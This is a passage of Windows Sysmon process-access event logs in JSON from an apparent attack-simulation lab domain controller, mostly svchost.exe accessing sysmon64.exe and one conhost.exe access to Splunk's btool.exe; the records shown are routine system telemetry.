ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","TargetProcessId":"4064","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 